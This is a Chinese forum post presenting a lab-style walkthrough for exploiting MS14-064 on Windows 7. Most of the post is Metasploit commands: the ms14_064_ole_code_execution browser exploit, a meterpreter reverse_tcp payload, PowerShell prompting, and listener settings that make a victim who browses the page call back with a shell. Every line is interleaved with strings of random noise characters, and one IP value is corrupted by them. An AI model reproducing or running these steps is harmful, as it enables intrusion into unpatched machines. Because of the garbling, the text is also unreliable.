找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1587|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ s9 _3 ]- a3 o! `! V6 @2 M 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示/ u t# d( Q i

]. D- E! f# U# `( ^; F. o) ^% T# ]

$ W9 ] I5 |, B0 O! ^1 n 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 3 c) V P/ s! z6 ]' p# C9 ]

" \) M- n( B! w( E6 B, M& o1 T

6 F2 v& I, w; r 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp / Z2 L, g5 T i, F2 ?- H4 j6 L

1 ^. H3 G4 H3 x: N9 P7 |

0 m( }2 k+ ?- l& }+ J- S, ^ a0 U) Y             set AllowPowershellPrompt true" a+ G1 z! |; L9 a2 x8 t V% A

D. j5 ?# D0 G4 r

4 v6 H; R7 k D! n' B0 a; B: I             Set LHOST 192.168.0.109 : Y4 @1 X) ~: V7 e$ y, K: F" K

; b/ B4 i& v& }3 B1 R& K& W

1 X s9 {7 B% E             set SRVHOST 192.168.0.1090 Q- J4 k- Q6 M7 `* j. ?! C

: n9 x- Y# G$ Y3 g# i

/ o( r& u1 m( ?8 i             Set uripath share : T# ]3 j; }, ?2 @/ k6 B+ r6 M2 m5 ^

7 Q1 j8 Y9 d; t5 P. f

- k* r8 w& ~9 O. w5 s i             Set srvport 80 D# n0 R1 X/ @2 ?4 {

. ~ |& ~. `; l4 c1 ]( z) u0 F

; ?- M, {% E; Z" Q% Q# f   4 c' P* q9 @2 H4 i8 W' f' U/ f

) k' ?4 {& Y8 P* y

- q: l, ?! _4 H p# a! i   & u7 [% r& p2 a0 b; }6 d- a

6 ?4 A j1 y K5 r8 S

1 ]6 V4 m Z; p8 Y: b2 d& Z' N% p  5 v/ x |* {; ?1 D: Q$ f$ b' r

0 c, L6 h) V- R) C0 x8 z( w# M$ D

% r2 d1 }) ~; m" G. T' D   - A) N+ i6 J( x( ~% V: H

6 g. u' z/ I' N, J+ h7 ^

5 V3 E5 O) N- B; e% m   2 T5 d" o9 ?6 p. l1 a% ~; o4 Y

; a+ L% ~( W9 ~+ ]6 n: c* e7 m# c

3 f6 H% R, Q1 q& b9 ~) q 下面我们来访问本地地址如图: ! b+ `3 m/ P) v. D+ L

6 O7 n: V# P8 R' E

+ q- q' V4 i- y. p7 |   4 |3 g+ z3 h `1 y r$ P5 z6 ]& K" z

# f$ x- ] Y/ ^1 Z9 Z8 ~

; H9 q3 N/ @" k; p/ V5 @( L   & e7 {0 O, [# j% {/ ~

j% z C0 M8 ^$ E" U5 K: Y

& z9 p' J% q9 F" T8 O1 w * n. _4 w) ^% Q. o5 E; i

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表